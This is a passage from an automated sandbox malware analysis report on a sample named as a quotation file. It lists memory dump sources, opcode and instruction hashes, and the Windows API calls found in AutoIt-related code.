                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d9184158a167693b14b0fce408746b38bd639920b2a78a4a1147bacd2b964b48
                                                                            • Instruction ID: 9536410e947d8483c57790e0602e42f95e70f96a0ad55680483bb0af024981a5
                                                                            • Opcode Fuzzy Hash: d9184158a167693b14b0fce408746b38bd639920b2a78a4a1147bacd2b964b48
                                                                            • Instruction Fuzzy Hash: 67320631A001158BDF28EF29C4D46FD7BA3EF45330F28866AD95A9B791D230DD82DB61
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1e2d5c853e89ce33f6fb63b8c5dcb65ebcaac94536c97b2026997b089bab2048
                                                                            • Instruction ID: 0632a8bf3a6338f8261a7d38bf35dff989a460423af42d10d2612158f292ec2c
                                                                            • Opcode Fuzzy Hash: 1e2d5c853e89ce33f6fb63b8c5dcb65ebcaac94536c97b2026997b089bab2048
                                                                            • Instruction Fuzzy Hash: E522A0B0A0460ADFDF14CF64C881AEEB7F7FF44300F248569E816A7291EB75A915CB94
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b0a993a889964e4605471364d4a924ba357188b323a94d1722766bf8337f953
                                                                            • Instruction ID: 9eae5ee2b6ba687e145a3fa6cea9e115b560b865d15c2880c9da329c2d132c45
                                                                            • Opcode Fuzzy Hash: 2b0a993a889964e4605471364d4a924ba357188b323a94d1722766bf8337f953
                                                                            • Instruction Fuzzy Hash: E002B7B1E00115EBDB05DF54D881AAEB7B6FF48300F1081A9E81A9B391EB71AA15CFD5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                            • Instruction ID: 2a5c10fd3d67b67abcc21792425a7625aec9c598bfd205ddd164dd72c7a62caa
                                                                            • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                            • Instruction Fuzzy Hash: 34020D71E002199FDF14CFA9C8806EDBBF2EF48325F25816AD819E7344D731AA45CB94
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0acc58effc8c6a64f963a4289d4d638eb0ceff23506042c41f5c2b3babd82c8d
                                                                            • Instruction ID: e4a5cc92f2aeb25f8f5c48066b0d1c444ab8421d8bb74bd6e80f7a4e240ee57c
                                                                            • Opcode Fuzzy Hash: 0acc58effc8c6a64f963a4289d4d638eb0ceff23506042c41f5c2b3babd82c8d
                                                                            • Instruction Fuzzy Hash: 42B1F220D2AF914DC72396398931336B75DAFBB6D5F52E31BFC1674E22EB2285834141
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                            • Instruction ID: b4b97d3ad94721a2d46c30eaaa554e2668f3c102477ed5889079a7ba43a7ea68
                                                                            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                            • Instruction Fuzzy Hash: D49177725080A34ADB29463985356BDFFF25E533A3B1A079DDCF2CE2C1EE14895DD620
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                            • Instruction ID: dc4f26612c77220b4079d945440d6d8e6c62f79ec80f6e750546735a87f37f38
                                                                            • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                            • Instruction Fuzzy Hash: 0A9154726090A34ADB694239847417EFFE35A933A3B1A079DDCF2CF2C5EE24855CD620
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                            • Instruction ID: aebdf2603426cb55d6e97aa0f7bebe88cb11576f94e185e20afce4bcfc84ca92
                                                                            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                            • Instruction Fuzzy Hash: 059158726090A34ADB2E427A85741BDFFE25A933A3B1A079DD8F2CE2C1FD14C55DD620
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 22f31321085f2d1d5f0504d7194d6183e1b27e4f5230b980a876a7271cee3434
                                                                            • Instruction ID: d5ef151b7162fdea43fe959d4643688ad026d66c4db2b009089b763414817906
                                                                            • Opcode Fuzzy Hash: 22f31321085f2d1d5f0504d7194d6183e1b27e4f5230b980a876a7271cee3434
                                                                            • Instruction Fuzzy Hash: 4061567160870A5BEA349E28BD95BFE239BDF51303F14091DEC42DB381DA11AE4EC319
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ddeb0fa200a1d3638e60433a36ef8467ac530647c7f50d8998cb333256452201
                                                                            • Instruction ID: 503a420fa969d302496b2dc1bb487af6f8ffbc59b354f9838333583088260557
                                                                            • Opcode Fuzzy Hash: ddeb0fa200a1d3638e60433a36ef8467ac530647c7f50d8998cb333256452201
                                                                            • Instruction Fuzzy Hash: 05616C7120870956DF384A28B856BFE23A7DF41703F100B5DED83DB781EA129D4F8255
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                            • Instruction ID: 1e1664daae0e2f7a0e984136cd22b3668cfd9eac30c9896fc8cd902865f86fdc
                                                                            • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                            • Instruction Fuzzy Hash: 5E8168725090A30ADB6D423D85345BEFFE35A933A3B1A079DD8F2CE2C1EE14995CD620
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 006B2B30
                                                                            • DeleteObject.GDI32(00000000), ref: 006B2B43
                                                                            • DestroyWindow.USER32 ref: 006B2B52
                                                                            • GetDesktopWindow.USER32 ref: 006B2B6D
                                                                            • GetWindowRect.USER32(00000000), ref: 006B2B74
                                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 006B2CA3
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 006B2CB1
                                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006B2CF8
                                                                            • GetClientRect.USER32(00000000,?), ref: 006B2D04
                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 006B2D40
                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006B2D62
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006B2D75
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006B2D80
                                                                            • GlobalLock.KERNEL32(00000000), ref: 006B2D89
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006B2D98
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 006B2DA1
                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006B2DA8
                                                                            • GlobalFree.KERNEL32(00000000), ref: 006B2DB3
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006B2DC5
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,006CFC38,00000000), ref: 006B2DDB
                                                                            • GlobalFree.KERNEL32(00000000), ref: 006B2DEB
                                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 006B2E11
                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 006B2E30
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006B2E52
                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006B303F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                            • API String ID: 2211948467-2373415609
                                                                            APIs
                                                                            • SetTextColor.GDI32(?,00000000), ref: 006C712F
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 006C7160
                                                                            • GetSysColor.USER32(0000000F), ref: 006C716C
                                                                            • SetBkColor.GDI32(?,000000FF), ref: 006C7186
                                                                            • SelectObject.GDI32(?,?), ref: 006C7195
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 006C71C0
                                                                            • GetSysColor.USER32(00000010), ref: 006C71C8
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 006C71CF
                                                                            • FrameRect.USER32(?,?,00000000), ref: 006C71DE
                                                                            • DeleteObject.GDI32(00000000), ref: 006C71E5
                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 006C7230
                                                                            • FillRect.USER32(?,?,?), ref: 006C7262
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006C7284
                                                                              • Part of subcall function 006C73E8: GetSysColor.USER32(00000012), ref: 006C7421
                                                                              • Part of subcall function 006C73E8: SetTextColor.GDI32(?,?), ref: 006C7425
                                                                              • Part of subcall function 006C73E8: GetSysColorBrush.USER32(0000000F), ref: 006C743B
                                                                              • Part of subcall function 006C73E8: GetSysColor.USER32(0000000F), ref: 006C7446
                                                                              • Part of subcall function 006C73E8: GetSysColor.USER32(00000011), ref: 006C7463
                                                                              • Part of subcall function 006C73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 006C7471
                                                                              • Part of subcall function 006C73E8: SelectObject.GDI32(?,00000000), ref: 006C7482
                                                                              • Part of subcall function 006C73E8: SetBkColor.GDI32(?,00000000), ref: 006C748B
                                                                              • Part of subcall function 006C73E8: SelectObject.GDI32(?,?), ref: 006C7498
                                                                              • Part of subcall function 006C73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 006C74B7
                                                                              • Part of subcall function 006C73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006C74CE
                                                                              • Part of subcall function 006C73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 006C74DB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                            • String ID:
                                                                            • API String ID: 4124339563-0
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?), ref: 00648E14
                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00686AC5
                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00686AFE
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00686F43
                                                                              • Part of subcall function 00648F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00648BE8,?,00000000,?,?,?,?,00648BBA,00000000,?), ref: 00648FC5
                                                                            • SendMessageW.USER32(?,00001053), ref: 00686F7F
                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00686F96
                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00686FAC
                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00686FB7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                            • String ID: 0
                                                                            • API String ID: 2760611726-4108050209
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000), ref: 006B273E
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 006B286A
                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 006B28A9
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 006B28B9
                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 006B2900
                                                                            • GetClientRect.USER32(00000000,?), ref: 006B290C
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 006B2955
                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006B2964
                                                                            • GetStockObject.GDI32(00000011), ref: 006B2974
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 006B2978
                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 006B2988
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006B2991
                                                                            • DeleteDC.GDI32(00000000), ref: 006B299A
                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006B29C6
                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 006B29DD
                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 006B2A1D
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 006B2A31
                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 006B2A42
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 006B2A77
                                                                            • GetStockObject.GDI32(00000011), ref: 006B2A82
                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006B2A8D
                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 006B2A97
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                            • API String ID: 2910397461-517079104
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 006A4AED
                                                                            • GetDriveTypeW.KERNEL32(?,006CCB68,?,\\.\,006CCC08), ref: 006A4BCA
                                                                            • SetErrorMode.KERNEL32(00000000,006CCB68,?,\\.\,006CCC08), ref: 006A4D36
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DriveType
